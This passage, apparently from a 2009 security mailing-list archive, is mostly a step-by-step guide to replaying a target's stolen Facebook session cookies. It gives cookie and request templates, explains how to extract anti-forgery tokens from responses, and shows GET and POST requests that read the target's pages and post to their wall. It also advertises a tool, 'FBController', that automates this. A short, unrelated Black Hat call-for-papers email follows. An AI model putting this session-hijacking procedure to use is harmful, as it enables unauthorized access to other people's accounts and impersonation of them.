Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-NEWTIMESTAMP)859; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US
[/code]

3 ] From the Response Obtained:

Gain the variable nctr[nid]. For now keep nctr[id] same as nctr[nid].

Calculating the new nctr[ct]: Add +79 to Original Timestamp. Append 3 more digits to its end.

Calculating &oldest= : Deduct 144556 from Original Timestamp.

Calculating composer_id: Search for UIComposer_STATE_PIC_OUTSIDE\" id=\" This will be your composer_id at the later stage in the Status Update Page / Other Post Request

Calculating post_form_id: Search for post_form_id:" This will be your post_form_id at the later stage in the Status Update Page / Other Post Request

Calculating fb_dtsg: Right after post_form_id (explained just above this section) you can locate fb_dtsg. Else search for ,fb_dtsg:" This will be your fb_dtsg at the later stage in the Status Update Page / Other Post Request

Your login_x actually looks like a:2:{s:5:"email";s:13:"you at youremailprovider.com";s:19:"remember_me_default";b:0;} But keep it unchanged in the hex format.

4 ] Send a GET Request like below with the above calculated variables:

[code]
GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750 HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Connection: Keep-Alive
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php
[/code]

5 ] In the output: Search for Env[\"nctrlid\"]=\" This is the NEW TRUE nctr[id]= for the Status Update POST Request :-)

6 ] Generate a new POST Request with the above calculated new variables:

[code]
POST /updatestatus.php HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php

action=HOME_UPDATE&home_tab_id=1&profile_id=(YOUR-10-DIGIT-PROFILE-ID)&status=TYPE-THE-STATUS-HERE&target_id=0&&composer_id=(24-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE))&post_form_id=(32-HEX-STRING-FROM-home.php-RESPONSE)&fb_dtsg=(27-HEX-STRING-)-FROM-home.php-RESPONSE&post_form_id_source=AsyncRequest&nctr[id]=(32-HEX-STRING-CALCULATED-AS-EXPLAINED-IN-POINT-5)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE)&nctr[ct]=(10-DIGIT-CALCULATED-TIMESTAMP-AS-EXPLAINED-In-POINT-3)375
[/code]

7 ] Use the above variables to view any content with the appropriate GET / requests

8 ] For POST-ing making changes, GOTO 2 ] and REDO :-)

Looks like loads of HardWork ha? If you don't want to do all this manually, then you can download this TooL named FBController (FACEBOOK CONTROLLER) written by me.

Till now FBController version 1.0 uses your Target's provided cookie and only:
A > Downloads the HomePage.
B > Allows you to Update the Target's Wall and
C > Retrieve your Target's Friend's List

There are many APIs available to write apps and 3rd party Tools for FB in Java, Perl, .NET, etc. FBConTroller was entirely written without knowing any of Facebook's Dev APIs. Considering the above along with Facebook's complexity, the next version might take some time to get released.

Many more features to come in version 2.0

A 26th April Release!
Research duration some 33 hours - Sunday Evening 26th April 2009 -to- 29th April 2009.

Happy Controlling! :-)

==============================================================

Download: http://my.opera.com/quakerdoomer/blog/2009/04/30/fbcontroller-facebook-controller-the-ultimate-facebook-controller-without-the-pa

The Latest available release is FBCONTROLLER version 1.0

Coded by: Azim Poonawala (QUAKERDOOMER)
Author's website: http://solidmecca.co.nr

Regards,
QUAKERDOOMER

From jmoss at blackhat.com Thu Apr 30 19:29:27 2009
From: jmoss at blackhat.com (jmoss)
Date: Thu, 30 Apr 2009 16:29:27 -0700
Subject: [Dailydave] BH USA CFP closing next Tuesday
Message-ID: <088501c9c9eb$814a5680$83df0380$@com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Hey guys, just a reminder that the CFP for Black Hat USA is closing next Tuesday. I'll post the first batch of acceptances next week.. some really solid stuff this year, from hacking ATM machines and lock picking forensics to injecting agents into VM guest OS and myths of Extended Validation SSL certificates.

Jeff

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.9.1 (Build 287)
Charset: UTF-8

wsBVAwUBSfo0WUqsDNqTZ/G1AQhyWwf7B/94B34C9kdZRRZAgWYgDIVDARUv6K51
/lzzBWrXWefzTCO8B4XVarlzPZJL61QHeCVuZ1XbzW+r3If4YdYz2vGjcepHQqRB
UQp/nWn8Cnomt/6IsczIVAwxv5fdSNZ7EJGDBE6v4XP0sTZS8yTE10ecSSKKF2Cf
99xBDXjxtpQHTvgQRlj3ygI/hV1hSuASJf74AIX904BQ1DN6uprpEXWUGFhUS1pB
6fYC3BuTt5YfRho+f2P8gR1z9aSyYkyrIReH8BvWMwFWefJUSDu4h8D6/qiVTrFg
H/o9EN4xJN1OFXmT59zWzjXVRY3eLXOwdGfpeDB8x9sdqT5ujCPcVw==
=XzFG
-----END PGP SIGNATURE-----